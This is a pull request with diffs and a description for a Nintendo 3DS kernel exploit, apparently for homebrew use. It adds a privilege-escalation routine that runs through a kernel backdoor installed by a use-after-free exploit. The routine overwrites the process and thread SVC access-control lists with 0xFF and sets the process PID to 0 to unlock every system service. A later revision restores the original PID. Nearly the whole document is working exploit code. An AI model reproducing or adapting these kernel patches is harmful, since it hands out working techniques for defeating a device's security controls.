### PR TITLE
Patch ACL & service accesses

### DIFF
--- a/source/exploit.c
+++ b/source/exploit.c
@@ -20,7 +20,7 @@ static u32 ktimer_base_offset;
 #define CURRENT_PROCESS 0xFFFF9004
 #define CURRENT_KTHREAD 0xFFFF9000
 #define PROCESS_ACL_OFFSET(is_new3ds) ((is_new3ds) ? 0x24 : 0x22)
-#define PROCESS_PID_OFFSET(is_new3ds) ((is_new3ds) ? 0xBC : 0xB4)
+#define PROCESS_PID_OFFSET(is_new3ds) ((is_new3ds) ? 0x2F : 0x2D)
 #define SVC_ACL_SIZE 0x10
 
 static u32 fptrs[16] = {
@@ -480,6 +480,7 @@ static bool try_uaf(u32 attempts) {
 
 static bool *kernel_patch_args;
 static u32 kernel_patch_ret;
+static s32 kernel_pid_orig;
 
 static void kernel_patch_acl() {
   __asm__ volatile("cpsid aif");
@@ -500,12 +501,28 @@ static void kernel_patch_acl() {
 }
 
 static void kernel_patch_pid() {
+  __asm__ volatile("cpsid aif");
+
   bool is_new = *kernel_patch_args;
   kernel_patch_ret = 0;
 
   u32 *current_process = *(u32**)(CURRENT_PROCESS);
   u32 *pid = current_process + PROCESS_PID_OFFSET(is_new);
+  kernel_pid_orig = *pid;
   *pid = 0;
+
+  kernel_patch_ret = 1;
+}
+
+static void kernel_restore_pid() {
+  __asm__ volatile("cpsid aif");
+
+  bool is_new = *kernel_patch_args;
+  kernel_patch_ret = 0;
+
+  u32 *current_process = *(u32**)(CURRENT_PROCESS);
+  u32 *pid = current_process + PROCESS_PID_OFFSET(is_new);
+  *pid = kernel_pid_orig;
 
   kernel_patch_ret = 1;
 }
@@ -531,6 +548,8 @@ bool elevate_system_privilege() {
 
   srvExit();
   srvInit();
+
+  svcGlobalBackdoor((s32(*)(void)) & kernel_restore_pid);
 
   return true;
 }

--- a/source/exploit.c
+++ b/source/exploit.c
@@ -17,6 +17,12 @@ static u32 ktimer_base_offset;
 
 #define TIMER2_NEXT_KERNEL 0xe281100c
 
+#define CURRENT_PROCESS 0xFFFF9004
+#define CURRENT_KTHREAD 0xFFFF9000
+#define PROCESS_ACL_OFFSET(is_new3ds) ((is_new3ds) ? 0x24 : 0x22)
+#define PROCESS_PID_OFFSET(is_new3ds) ((is_new3ds) ? 0xBC : 0xB4)
+#define SVC_ACL_SIZE 0x10
+
 static u32 fptrs[16] = {
   (u32)&install_global_backdoor,
   (u32)&install_global_backdoor,
@@ -472,6 +478,63 @@ static bool try_uaf(u32 attempts) {
   return false;
 }
 
+static bool *kernel_patch_args;
+static u32 kernel_patch_ret;
+
+static void kernel_patch_acl() {
+  __asm__ volatile("cpsid aif");
+
+  kernel_patch_ret = 0;
+
+  bool is_new = *kernel_patch_args;
+
+  u32 *current_process = *(u32**)(CURRENT_PROCESS);
+  u32 *proc_acl = current_process + PROCESS_ACL_OFFSET(is_new);
+  memset(proc_acl, 0xFF, SVC_ACL_SIZE);
+
+  u32 **current_kthread = *(u32***)(CURRENT_KTHREAD);
+  u32 *thread_acl = *(current_kthread + 0x22) - 0x6;
+  memset(thread_acl, 0xFF, SVC_ACL_SIZE);
+
+  kernel_patch_ret = 1;
+}
+
+static void kernel_patch_pid() {
+  bool is_new = *kernel_patch_args;
+  kernel_patch_ret = 0;
+
+  u32 *current_process = *(u32**)(CURRENT_PROCESS);
+  u32 *pid = current_process + PROCESS_PID_OFFSET(is_new);
+  *pid = 0;
+
+  kernel_patch_ret = 1;
+}
+
+/* Copy from waithax & svchax */
+bool elevate_system_privilege() {
+  bool is_new = osGetKernelVersion();
+  kernel_patch_args = &is_new;
+
+  svcGlobalBackdoor((s32(*)(void)) & kernel_patch_acl);
+
+  if (!kernel_patch_ret) {
+    printf("elevate_system_privilege: couldn't patch SVC ACL.\n");
+    return false;
+  }
+
+  svcGlobalBackdoor((s32(*)(void)) & kernel_patch_pid);
+
+  if (!kernel_patch_ret) {
+    printf("elevate_system_privilege: couldn't patch PID.\n");
+    return false;
+  }
+
+  srvExit();
+  srvInit();
+
+  return true;
+}
+
 #define NUM_ATTEMPTS 0x10000
 
 bool k11_exploit() {
@@ -515,6 +578,12 @@ bool k11_exploit() {
     return false;
   }
 
+  if (!elevate_system_privilege()) {
+    printf("[-] Couldn't patch ACL & service accesses.\n");
+    wait_for_user();
+    // if fail elevate privilege, still need cleanup
+  }
+
   if (!cleanup_uaf()) {
     printf("[-] Warning! Exploit succeeded couldn't cleanup kernel.\n");
     printf("[-] System instability may occur.\n");
@@ -524,3 +593,4 @@ bool k11_exploit() {
 
   return true;
 }
+


### PR DESCRIPTION
At least, `svc 0x7b` still require to elevate perm.
so, code copy from `waithax`, and little change using `svchax` code;
but I'm sure two version are same.

In my test, `PID` should restore to original value, if remain `0`, make stuck at launch next homebrew.
This problem will make patchset to looks like quite useless .
But `svc ACL` still applied global, only impacted `PID`(it require for the accessing all services).

So, now all `svc ACL` marked `0xFF` and can access all services after hax until exit hax app.
Then enabled `ACL` and services closed after exit app.